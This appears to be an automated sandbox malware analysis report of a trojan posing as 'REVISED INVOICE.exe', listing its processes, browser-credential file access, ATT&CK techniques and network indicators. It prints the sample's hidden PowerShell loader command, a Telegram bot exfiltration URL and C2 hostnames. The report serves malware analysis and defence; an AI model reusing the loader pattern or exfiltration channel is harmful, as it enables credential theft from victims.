          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 1D40000Jump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetFolderPathW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406041

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 2504, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          2
          Obfuscated Files or Information
          1
          OS Credential Dumping
          2
          File and Directory Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Command and Scripting Interpreter
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          1
          DLL Side-Loading
          LSASS Memory14
          System Information Discovery
          Remote Desktop Protocol1
          Data from Local System
          3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts2
          PowerShell
          Logon Script (Windows)311
          Process Injection
          12
          Masquerading
          Security Account Manager1
          Security Software Discovery
          SMB/Windows Admin Shares1
          Email Collection
          11
          Encrypted Channel
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Modify Registry
          NTDS1
          Process Discovery
          Distributed Component Object Model1
          Clipboard Data
          3
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script21
          Virtualization/Sandbox Evasion
          LSA Secrets21
          Virtualization/Sandbox Evasion
          SSHKeylogging14
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Access Token Manipulation
          Cached Domain Credentials1
          Application Window Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
          Process Injection
          DCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          REVISED INVOICE.exe3%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exe3%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          http://ocsp.entrust.net030%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
          http://checkip.dyndns.org/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://reallyfreegeoip.org0%URL Reputationsafe
          http://checkip.dyndns.com0%URL Reputationsafe
          http://ocsp.entrust.net0D0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          https://reallyfreegeoip.org/xml/0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://crl.entrust.net/server1.crl00%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          http://checkip.dyndns.org0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://reallyfreegeoip.org0%URL Reputationsafe
          https://secure.comodo.com/CPS00%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          drive.google.com
          142.250.186.142
          truefalse
            unknown
            drive.usercontent.google.com
            142.250.186.97
            truefalse
              unknown
              reallyfreegeoip.org
              188.114.97.3
              truetrue
                unknown
                api.telegram.org
                149.154.167.220
                truetrue
                  unknown
                  checkip.dyndns.com
                  193.122.130.0
                  truefalse
                    unknown
                    checkip.dyndns.org
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://reallyfreegeoip.org/xml/173.254.250.71false
                        unknown
                        http://checkip.dyndns.org/false
                        • URL Reputation: safe
                        unknown
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmfmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            https://api.telegram.orgmsiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://api.telegram.org/botmsiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                http://ocsp.entrust.net03msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://drive.google.com/tmsiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://www.diginotar.nl/cps/pkioverheid0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://varders.kozow.com:8081msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://drive.google.com/msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://www.google.com/search?q=wmfmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://contoso.com/powershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.629157566.00000000221EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://checkip.dyndns.commsiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://ocsp.entrust.net0Dmsiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20amsiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.480576580.0000000002531000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.entrust.net/server1.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&imsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.481361514.0000000003559000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222A0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022274000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221C7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmsiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://nsis.sf.net/NSIS_ErrorErrorREVISED INVOICE.exe, REVISED INVOICE.exe.3.drfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000005.00000002.629157566.00000000222EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://www.google.com/favicon.icomsiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://aborters.duckdns.org:8081msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://www.google.com/sorry/indexmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000221D3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26amsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.google.com/search?q=netmsiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://www.google.com/sorry/indextestmsiexec.exe, 00000005.00000002.629514463.00000000232EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023238000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023346000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002330E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.0000000023292000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.000000002325A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://api.telegram.orgmsiexec.exe, 00000005.00000002.629157566.00000000222F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://secure.comodo.com/CPS0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://reallyfreegeoip.org/xml/173.254.250.714msiexec.exe, 00000005.00000002.629157566.000000002227C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022285000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222DD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022293000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222BC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022216000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000222CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.0000000022267000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://crl.entrust.net/2048ca.crl0msiexec.exe, 00000005.00000002.625215938.0000000000365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.629157566.00000000223B8000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231AB000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223F9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.000000002240C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629514463.00000000231F7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.629157566.00000000223CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          132.226.8.169
                                                                          unknownUnited States
                                                                          16989UTMEMUSfalse
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUtrue
                                                                          188.114.97.3
                                                                          reallyfreegeoip.orgEuropean Union
                                                                          13335CLOUDFLARENETUStrue
                                                                          188.114.96.3
                                                                          unknownEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          142.250.186.142
                                                                          drive.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          193.122.130.0
                                                                          checkip.dyndns.comUnited States
                                                                          31898ORACLE-BMC-31898USfalse
                                                                          142.250.186.97
                                                                          drive.usercontent.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          132.226.247.73
                                                                          unknownUnited States
                                                                          16989UTMEMUSfalse
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1541088
                                                                          Start date and time:2024-10-24 12:00:55 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 26s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:9
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:REVISED INVOICE.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.evad.winEXE@5/16@28/8
                                                                          EGA Information:
                                                                          • Successful, ratio: 33.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 93%
                                                                          • Number of executed functions: 115
                                                                          • Number of non-executed functions: 105
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                          • Execution Graph export aborted for target msiexec.exe, PID 2504 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 1960 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: REVISED INVOICE.exe
                                                                          TimeTypeDescription
                                                                          06:01:56API Interceptor1x Sleep call for process: REVISED INVOICE.exe modified
                                                                          06:01:57API Interceptor206x Sleep call for process: powershell.exe modified
                                                                          06:02:59API Interceptor1394x Sleep call for process: msiexec.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          132.226.8.169SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          FINAL SHIPPING DOCS.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
